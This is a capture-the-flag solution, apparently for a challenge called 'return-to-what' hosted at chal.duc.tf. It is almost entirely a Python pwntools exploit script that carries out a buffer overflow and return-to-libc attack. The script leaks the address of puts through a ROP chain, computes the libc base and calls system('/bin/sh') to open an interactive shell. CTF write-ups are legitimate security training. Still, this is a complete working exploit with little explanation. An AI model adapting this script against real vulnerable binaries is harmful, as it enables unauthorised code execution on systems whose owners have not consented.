Tags: bufferoverflow ret2libc ropchain
Rating:
Buffer Overflow, Strandard Return2Libc
```
#!/usr/bin/python
from pwn import *
context(os='linux',arch='amd64')
context.log_level = 'DEBUG'
#p = process('./return-to-what')
p = remote('chal.duc.tf', 30003)
e = ELF('./return-to-what')
libc = ELF('./libc.so.6')
JUNK = "A"*56
main = e.symbols['main']
gets = e.plt['gets']
plt_puts = e.plt['puts']
got_puts = e.got['puts']
pop_rdi = e.search(asm('pop rdi; ret')).next()
bss = e.get_section_by_name('.bss')["sh_addr"]+1500
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(gets) + p64(pop_rdi) + p64(got_puts) + p64(plt_puts) + p64(main)
p.recvuntil("to?\n")
p.sendline(payload)
p.sendline("/bin/sh\x00")
leak = u64(p.recvline().strip().ljust(8,"\x00"))
print hex(leak)
libc_puts = libc.symbols['puts']
libc_system = libc.symbols['system']
lba = leak - libc_puts
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(libc_system + lba)
p.recvuntil("to?\n")
p.sendline(payload)
p.interactive()
```
